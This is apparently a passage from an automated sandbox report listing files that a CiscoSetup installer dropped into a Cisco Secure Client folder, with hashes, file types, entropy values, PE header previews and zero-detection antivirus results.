                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):54176
                                                                                                                                      Entropy (8bit):6.343089804418659
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:/eDOHgIUkjxLqAW2ltHbfvFSzNhQxVBqv5jJwPB2M:2KHgIUkjxLqAW2l5vFSzNiqv51m
                                                                                                                                      MD5:98B8845F3554BAD1329541D54EADD3F0
                                                                                                                                      SHA1:FDB21CC76F860AB39D265A01846C81A707078BBB
                                                                                                                                      SHA-256:506AB485FE0DA85C6DF6D0B7ABBAD412ACA6A8EB3F575DFC2C81662107054792
                                                                                                                                      SHA-512:12D14D027679FE76820148D51A9B8AEAF5D024C5D49A85238B2D70780D05F046EEAB1F7A7EC8E50EE64851E3D9033443FF64E01FBCA35AE1AE56E5D09F4BB8D3
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Y=MA8S.A8S.A8S.USR.D8S.A8R.l8S.USP.E8S.USW.D8S..M[.D8S..M..@8S..MQ.@8S.RichA8S.................PE..d......a.........."............................@....................................#M....`a................................................|...<.......H................!...... .......T..............................................x............................text...bu.......v.................. ..h.rdata..|............z..............@..H.data...............................@....pdata..............................@..HPAGE................................ ..`INIT................................ ..b.rsrc...H...........................@..B.reloc.. ...........................@..B................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\is-H5812.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):562280
                                                                                                                                      Entropy (8bit):5.250676972668652
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:E51t8uFDD2edf0sC3Yeba96ga8nXNBZeph17:O12uR2ec3Yijg/dB4ph17
                                                                                                                                      MD5:A942F7085CF6E0584943727A7B804342
                                                                                                                                      SHA1:C79F5A2946400942F75BB6D05A853D4018ED7419
                                                                                                                                      SHA-256:AB1ABBFB3F0AD6A0E16F8FC94F485C67A8AB002A5C05549CF676E4D701E26FF0
                                                                                                                                      SHA-512:69D42640785AA0B4FABBADD894A92643B4D32BC6FB404B0CCC0B056D8413ABD3684D81BED43D10CED24620BF26A749B4F87A557916F987501986DCA9980C0F44
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y.Dz=.*)=.*)=.*)).)(6.*))./(..*))..(/.*)o..(,.*)o.)(,.*)o./(..*)..+(9.*)).+(6.*)=.+)..*)..#(8.*)...)<.*)=..)<.*)..((<.*)Rich=.*)................PE..L......d.....................P......0 ....... ....@.......................................@............................................x............L..hH..............T...............................@............ ...............................text............................... ..`.rdata....... ......................@..@.data...............................@....rsrc...x...........................@..@.reloc...............8..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\is-HOMEN.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):10484
                                                                                                                                      Entropy (8bit):7.081965462144553
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:Xr1RLG32vJCEvyyKwnsFWQFl2j21EhqnajKs8E:lvrnsFR72qslGs8E
                                                                                                                                      MD5:38B464383C531FF40AD2538CF4442C25
                                                                                                                                      SHA1:899E6C26E8362C3811189977640D5B625B566CD9
                                                                                                                                      SHA-256:C130160691DA77B3AFD58E642A09439709C6B60729E6CFB06EE687A02B7E2A68
                                                                                                                                      SHA-512:407AD6D59035AC10A6CBEB368F72772A6CDBB889934BA4097046BD489CA5E36D4374E5C6655485AB28419D0EB45587C664E65113589E6131FB208D7ABDB4F885
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:0.(...*.H........(.0.(....1.0...`.H.e......0.....+.....7......0...0...+.....7......>.O.>I.......f..220217132307Z0...+.....7.....0...0....R4.4.2.B.1.1.8.F.3.7.D.A.5.5.C.9.2.3.A.D.2.E.4.9.7.C.F.2.B.2.6.E.2.9.5.0.2.F.4.D...1..A0>..+.....7...100....F.i.l.e........v.p.n.v.a.6.4.-.6...s.y.s...0L..+.....7...1>0<...O.S.A.t.t.r.......&2.:.6...1.,.2.:.6...3.,.2.:.1.0...0...0M..+.....7...1?0=0...+.....7...0...........0!0...+........D+..7.U.#..I|.n)P/M0b..+.....7...1T0R.L.{.C.6.8.9.A.A.B.8.-.8.E.7.8.-.1.1.D.0.-.8.C.4.7.-.0.0.C.0.4.F.C.2.9.5.E.E.}....0....R8.4.B.B.1.C.E.C.D.D.3.8.F.D.2.0.3.D.2.E.E.9.6.9.1.9.0.2.C.3.F.C.C.B.D.E.D.3.6.6...1..50:..+.....7...1,0*...F.i.l.e........v.p.n.v.a.-.6...i.n.f...0E..+.....7...17050...+.....7.......0!0...+.............8. =..i.......f0L..+.....7...1>0<...O.S.A.t.t.r.......&2.:.6...1.,.2.:.6...3.,.2.:.1.0...0...0b..+.....7...1T0R.L.{.D.E.3.5.1.A.4.2.-.8.E.5.9.-.1.1.D.0.-.8.C.4.7.-.0.0.C.0.4.F.C.2.9.5.E.E.}....0....RB.B.A.C.C.3.7.6.5.1.5.D.4.1.0.F.C.4.9.7.C.A.B.1

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\is-I704D.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):97384
                                                                                                                                      Entropy (8bit):6.671284905085064
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:uqA5yIFN6BM8oAb7KgcvteBM53LZLux2ZXcpXNmzoPd0y+oo49FxyrPxTq:05yIFIM8pbeteBMXNZXI0y+oo4P
                                                                                                                                      MD5:7E67C939282B7893B1FC6624F7BE497E
                                                                                                                                      SHA1:E38043283573321310A9028EDAA4CC5E79C0B033
                                                                                                                                      SHA-256:5263F59556A66F4837D866BDD3C81D4D552811DDF554F76AB64902D3A5486D8E
                                                                                                                                      SHA-512:014DE12B5EAE20091F99256C381272B3323284FD5D8014E740FE3FA4C27B9F7449AE29D91E196BE3FE7E903B887B6BE03889B7A7F8312640AF5228C33B15063A
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................1.................................._..........._......_......_......Rich...........................PE..L.....^...........!.........n...............................................p......iU....@.................................X$.......@...............4..hH...P......p.......................0...........@...............P............................text...k........................... ..`.rdata..DM.......N..................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P....... ..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\is-KHO2L.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):96872
                                                                                                                                      Entropy (8bit):6.7074578724573355
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:khfMwC52VJJ1NkaqH1d+VvzNRqubyXCsMAvJxMnYTxB:wfRVJJ1NkaqHP+fRqpXCsMAvIy
                                                                                                                                      MD5:4A99D4199F25191F921F0EA08948FAED
                                                                                                                                      SHA1:C1EEDF728A46CCD4FE0897FAAC3B859941AAB81D
                                                                                                                                      SHA-256:3F78B54296FF87AEF6F0FCAC9DDFF1AD93A336AC4336D2C43CD57BEEA0E22065
                                                                                                                                      SHA-512:85753CE8051EFCB5F278A722CC34F1362EF0DA1AEE494D455EC8EDEF09FE81591A3D6EFF19D623C5B743E3CAE887DC5786805EBA527333CDAFC078A0A4291335
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E....{..{..{...~..{.S...{.S...{.S...{.S...{.....{.....{..{.{.....{......{..{z..{.....{.Rich.{.................PE..L.....d.....................|......p.............@..........................`......il....@..........................................@...............2..hH...P......8...T...............................@............................................text.............................. ..`.rdata...R.......T..................@..@.data...D....0......................@....rsrc........@......................@..@.reloc.......P......."..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\is-KLEUG.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1134696
                                                                                                                                      Entropy (8bit):5.98101366214949
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:8h0jAkQkbL6TwyIHQ6KkuD/wNo9beiC3Yeba96ga8nXNBZy:8hAA7kbL6TwyIHQZ/wNf3Yijg/dBU
                                                                                                                                      MD5:5E20E06C6F8A52DF2A20F24BF8E7ED28
                                                                                                                                      SHA1:F43253FC29F72A6792A49F8499C8547328CB3060
                                                                                                                                      SHA-256:B2628E6B3620070511BC7BFD7EC75BF30F194D69560DC4925A2CB208EBFF8EA5
                                                                                                                                      SHA-512:06733AA3684278AD1E00F0F7070BED46698422104AA89E3563154A6477186F0DC34B4C6598B101941AB9C34055891CA1A697B8F233156953D09A184291018CBD
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#...g..Yg..Yg..Ys..Xl..Ys..Xt..Ys..X...Y5..Xv..Y5..Xm..Y5..X5..Ys..Xl..Yg..Y...Y...Xk..Y...Yf..Yg.nYf..Y...Xf..YRichg..Y........PE..d......d.........."..........P.......^.........@.............................p............`................................................. ...x............0..03......hH...0...5..(...T.......................(.......8............................................text...|........................... ..`.rdata..............................@..@.data....1..........................@....pdata..03...0...4..................@..@_RDATA.......p......................@..@.rsrc................0..............@..@.reloc...5...0...6..................@..B........................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\is-MGVA1.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4467816
                                                                                                                                      Entropy (8bit):6.598146073323608
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:98304:+QCnFew3oMj8NiqvOE41lDJO2Gi3VjGClUjtbnaC:+TeOLECDJrpVSZbL
                                                                                                                                      MD5:03615EEF106C5E54C5279B05A9686B9A
                                                                                                                                      SHA1:621C9AB49367298751EAAB0E0A29575327041729
                                                                                                                                      SHA-256:7B6826DD31DB6E559BBF873DE756292B22B910F319C6C4B09D7A62A5312A4AC3
                                                                                                                                      SHA-512:BFB2ADE2B66B7CCD3E1CB9FCFAD2AF8D35BD12E063ECC1D388958C5A66776CC865CDD25B72B3786011C388C9A3FF730DAF5F97D58923829DA9DBC76AD393FCE8
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........d..............n.......n..q....jf......p.......p.......p.......n.......l...............p..Q....n..........p...|p..s...|pd.............|p......Rich....................PE..L......d..................)...................)...@..........................`D......YD...@...................................8.T.....:.X.............C.hH... B..6..0.6.T.....................6.......6.@.............)..............................text.....).......)................. ..`.rdata..fd....)..f....).............@..@.data.........9.......8.............@....rsrc...X.....:.. ....9.............@..@.reloc...6... B..8....A.............@..B................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\is-MKOUV.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):436600
                                                                                                                                      Entropy (8bit):6.647435576141042
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:/gO0BGzePo6+J+4P0xYv7IQgnhUgiW6QR7t5s03Ooc8dHkC2esKcWKe0:701Po6+J+dxYv7IQgk03Ooc8dHkC2ezc
                                                                                                                                      MD5:8FF1898897F3F4391803C7253366A87B
                                                                                                                                      SHA1:9BDBEED8F75A892B6B630EF9E634667F4C620FA0
                                                                                                                                      SHA-256:51398691FEEF7AE0A876B523AEC47C4A06D9A1EE62F1A0AEE27DE6D6191C68AD
                                                                                                                                      SHA-512:CB071AD55BEAA541B5BAF1F7D5E145F2C26FBEE53E535E8C31B8F2B8DF4BF7723F7BEF214B670B2C3DE57A4A75711DD204A940A2158939AD72F551E32DA7AB03
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p.. 4.os4.os4.os..nr6.os=..s".os4.ns..osf.nr7.osf.kr?.osf.lr<.osf.jr..osf.or5.osf.s5.osf.mr5.osRich4.os........................PE..L...>|.a.........."!.........~...............0............................................@A.........................T......<c..........................x#.......6...W..8............................W..@............`..8............................text...b........................... ..`.data...L(...0......................@....idata.......`.......2..............@..@.rsrc................J..............@..@.reloc...6.......8...N..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\is-MMI8M.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1224808
                                                                                                                                      Entropy (8bit):6.594618609606493
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24576:lmwdP48+4TrmxqxHK1Kl7VWGPq7XbRh9F:Hm+hlB5PWRh9F
                                                                                                                                      MD5:2B773B8A1509ACDCCE63BBE24AD6020A
                                                                                                                                      SHA1:D47D47514E2B68952886FD1CBC99BF397C1A08FC
                                                                                                                                      SHA-256:2A20046DC84FC6D3D75D2E9C8AD761175739CB2E0D372CF22172C86F109620B4
                                                                                                                                      SHA-512:62C2EA22994C6CCBB2C11D044053A2DC0E687C04477DCA0DD48787FB544EF2C780A1AA31455AE47D033533E0D81B5FC1C9FF715C62BA1D51D1893322280F5B8C
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......u...1...1...1...8.].!......5...c...=...c...8...c.......c...5......9...%...0...%...4...d...5...%... ...1...m...........1.0...1.Y.0......0...Rich1...........................PE..L...(..d.....................<...............@....@.................................S.....@.............................................h............h..hH..............T........................... ...@............@...............................text...J,.......................... ..`.rdata...!...@..."...2..............@..@.data...\1...p...,...T..............@....rsrc...h...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\is-N98KR.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2392680
                                                                                                                                      Entropy (8bit):6.658300142387931
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:49152:dFtYsvJwGcAhLrE0o5r+1mP/4qkxhDzMkfUg8Ul6:dFTNrEvmDzMkfP85
                                                                                                                                      MD5:208BC604DF1E3C9FF524C9AD9066E552
                                                                                                                                      SHA1:DC76F03E1A6851A8610FCA6A73EFCA567ADA84CB
                                                                                                                                      SHA-256:025635A4E805DA1241F752FE664C766B745C7F70DE070DC4AC87875D249150C5
                                                                                                                                      SHA-512:4A95407898D6EA16ED96208B9B94825091CA9E554A278654D71009AE04C695FEF3745BA3FF2DFFD5FF1C76DC62C58522300F0FD903F52F0A3E4F68DA5CE23892
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......t..0...0...0...9.w.$.......8...b...4...b...:...b...9...$...2.......2...b...,...e...4...$...-...0.......$...1..............1.......1...0.s.1.......1...Rich0...........PE..L.....d...........!.........d................................................$.......$...@A........................pm..D1....!......."..B...........:$.hH...."......D..T...................@E......`D..@............................................text...Z........................... ..`.rdata..............................@..@.data.........!.......!.............@....rsrc....B...."..D...n".............@..@.reloc........".......".............@..B................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\is-O18K3.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):305568
                                                                                                                                      Entropy (8bit):6.508762969375985
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:RU6viRkqf6rRsLewEo2eCf4nkra75QtUNxNad3fv27/iTf7G/:RU6viRkqf6rRsLew/23Qkro7x4Vfvwd/
                                                                                                                                      MD5:7119F4B20ECBF6BBB4478A983D34AC70
                                                                                                                                      SHA1:60C6E6B2EF96C540318FBEDEDF81F5D8BD90148E
                                                                                                                                      SHA-256:372D4C634E9C8F1DA8EE0ED5DD54E4D2956564FF7FCF62CDEF20689D2EC47F92
                                                                                                                                      SHA-512:5895F370D1641611BB110D75AADA34DC34359DA83143FE067BB8DD99CCBAB64B832BA7B958C3F09D81B78E3ABBD4601A495BD51070C053D298E7A48745CEC0BC
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......k.../.../.../...&.~.,...&.e.-...;.............;..(...;...+...;..(...;...$.../..........5...................Rich/...................PE..d....a.d.........."............................@.............................0...........`A................................................d....................$.......%... ..\.......T............................................................................text............................... ..h.rdata..`<.......>..................@..H.data....d... ......................@....pdata...$.......&..................@..HPAGE.................<.............. ..`INIT.................Z.............. ..b.rsrc................n..............@..B.reloc..\.... ......................@..B........................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\is-OJMRD.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):267656
                                                                                                                                      Entropy (8bit):6.547035182798101
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:+9WZ4GcvxHdmJOHpxyBIBaQ0I/Quljl1mn48MHnlwgSmiSb:+VFTmJO/BH0IYuljK48ZgS0
                                                                                                                                      MD5:2FB4C4168E379F13B15D4E299ECF3429
                                                                                                                                      SHA1:4C6702254054F288BEB49ADCDD6317575E83374D
                                                                                                                                      SHA-256:8CD7BE490AD502C9980CB47C9A7162AFCCC088D9A2159D3BBBCED23A9BCBDA7F
                                                                                                                                      SHA-512:8BC80A720CDC38D58AB742D19317FBE7C36CFB0261BB9B3D5F3B366459B2801B95F8E71FB24D85B79F2C2BC43E7EB135DAB0B81953C7007A5C01494C9F584208
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Hb.:...i...i...i.{.i...i^v.h...i^v.h...i^v.h...i^v.h...i.s.h...i...i...i^v.h...i^v.h...i^v.i...i^v.h...iRich...i................PE..L....~.a.........."!.........................0............................... ......Gp....@A........................@....=...............................#......TX..\J..8............................J..@............................................text...[........................... ..`.data....o...0...l..................@....idata..............................@..@.rsrc...............................@..@.reloc..TX.......Z..................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\is-OTMTE.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):624232
                                                                                                                                      Entropy (8bit):6.548375643467659
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:XaEbYc+L1pQ1aE6Qo+gbEXefqR5nB3naFKMwKKbtxbZ6+XZdtbjmb2gOb/vBUbyk:XaEbYc+LUtB3ZssEiqYfQQEvFBEfI+Q
                                                                                                                                      MD5:1536EB035B356121711182E1A3413658
                                                                                                                                      SHA1:D188D4ABF1FFA6C7E577D9AD3FDCF1ED57C6BD85
                                                                                                                                      SHA-256:DD600CEDE829CFBE9E1B5B2F1B35219294654C19DC4E9E208CFCF6DF71F2B957
                                                                                                                                      SHA-512:049CA3075D2BE2E0DD3FFD59C5C7EE0A417D3565ED53E9E589CFF7E68AE8E34C91824A97EC6C1C6E0139D4DF485906632E066CC21805FBB299E3FBB1E11A568E
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......]..Q..~...~...~.......~.......~.K.z...~.K.}...~.K.....~......~...z...~.K.{.6.~.......~...~...~.....G.~..w...~......~.......~..|...~.Rich..~.........................PE..L......d.................0..........`$.......@....@..........................p......@b....@.................................`2..........pS...........>..hH.......Q......T..............................@............@..l............................text..../.......0.................. ..`.rdata..P....@.......4..............@..@.data....K...`...F...R..............@....rsrc...pS.......T..................@..@.reloc...Q.......R..................@..B................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\is-P9NEN.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):42600
                                                                                                                                      Entropy (8bit):6.850341851307747
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:MoodVjT3FVIgFC1wTDRDGV5ENAMxGhDGVumuAMxkEX:norjT1VImC14DdxGhfxr
                                                                                                                                      MD5:0FA61F44C8C84022B2D7BC3D2D799562
                                                                                                                                      SHA1:6AB650840B91DF72F066A3D3882E5A8891F36E07
                                                                                                                                      SHA-256:65FD7DC0ED6E034BD6A956ABC357631B87B094A3587AAF91793233CC44E813EC
                                                                                                                                      SHA-512:FBB9156C946C1D110545ABCBB663A5A6B596EC4880F3400B4824728E5EF396B0976DFAF9F6E41377F3825DC7BC9D46DDB6BEA0172C9A51CEB55636D4722460B9
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?.X.^h..^h..^h..&...^h..+l..^h..+k..^h..+m..^h..+i..^h..+i..^h..5i..^h..^i..^h..+a..^h..+...^h..^...^h..+j..^h.Rich.^h.................PE..L...K..d.................4...*......p .......P....@.......................................@.................................8].......................^..hH..........LU..T............................U..@............P..,............................text....2.......4.................. ..`.rdata.......P.......8..............@..@.data...L....p.......P..............@....rsrc................R..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\is-Q2D0Q.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):243576
                                                                                                                                      Entropy (8bit):6.63219267320993
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:aLy1UNAZHA2nSG5LbEcutDsSaqiOHYb836TLLOeHFQyS9uLms12z/NpJ9yne:2hkH0Yb83KLxmuLmdzoe
                                                                                                                                      MD5:9AD549C121108B3B1408A30BEE325D08
                                                                                                                                      SHA1:898FFC728087861E619DABABD8E65CC902276D06
                                                                                                                                      SHA-256:263975E4F5AFC90E91F9F601080B92C9FBC5E471132F63AD01C6C4F99B33B83A
                                                                                                                                      SHA-512:9A9005ACF2AF86D6A0A95773E968D98E90B7E71E8E71D58949FF51AAD49050DCA57D94A19671B1B5026BD74E7B627F31D0C8A50BB66AB740D629022C3A95D579
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V.3...]X..]X..]X..\Y..]X...X..]X@.\Y..]X..\X..]X@.YY..]X@.^Y..]X@.XYA.]X@.]Y..]X@..X..]X@._Y..]XRich..]X................PE..L...=|.a.........."!.........x......p........0......................................?I....@A........................ ....K..<r..........................x#.......+...;..8............................<..@............p..8............................text............................... ..`.data....4...0...2... ..............@....idata..~....p.......R..............@..@.rsrc................d..............@..@.reloc...+.......,...h..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\is-Q7D23.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):660072
                                                                                                                                      Entropy (8bit):6.659866758160457
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:kSCossJt+kPCULOLT5xylm6hSCX+JGvP755x+RpUG1m3A0KmklXz0OH9IYW4U+1M:kbAJDOLT5po+kPARgA0KmuXz0OH9H3Ov
                                                                                                                                      MD5:5E4035EF3C0EEC7E49035F5DCD6054FF
                                                                                                                                      SHA1:633A4E83FF976CF041B65B7B6B1B54C697DAB0F5
                                                                                                                                      SHA-256:31F4F3D3A3F1E1761417FD9792B4151CD8C2724F2B83AD2C51C3E9A0D4D19BE4
                                                                                                                                      SHA-512:A0BA4A69A7D0EEDACC1F25361A69CA7D73CFC893632C1033858ED08BA2DEEED00592972BCB1FF6D075AFE5E8B64291F47A3E0FF6346CC3228A6C989DF10D857E
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Rj...............sQ.....D~......D~......D~......D~.......~......b..<....`......C~..............~..-....~.......~=.......U......~......Rich....................PE..L......d...........!......................................................................@A............................<...,...T....p..................hH......L{...z..T...................@|......H{..@...............0............................text............................... ..`.rdata...K.......L..................@..@.data...@....P.......<..............@....rsrc........p.......F..............@..@.reloc..L{.......|...N..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\is-QSJT8.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):451
                                                                                                                                      Entropy (8bit):3.838636988372643
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:3FFU5eWNwSrzakk5CGvFF6cqEPtvFFEHxiulEk9bkNy4SQUa:1e5eU/aHHAcqE/uxiTKTM
                                                                                                                                      MD5:F31B286BC9DAC414CAE57B36020FDB4A
                                                                                                                                      SHA1:BD9D861EA0BC7DBDB9A1C9949ADFB7BDF3345C6B
                                                                                                                                      SHA-256:7778B7BB7E7F9D25D71747BAA3BEB76E39C0336EB9DA0D823D7C6297540E7975
                                                                                                                                      SHA-512:937B660BDD91A8467DB83F9B5B25046D0443EB2648671CE420F9A032123A479B249B9001D860BDA4FE3488065F0FF02AD01BA758CB11EE07710C7651FA072945
                                                                                                                                      Malicious:false
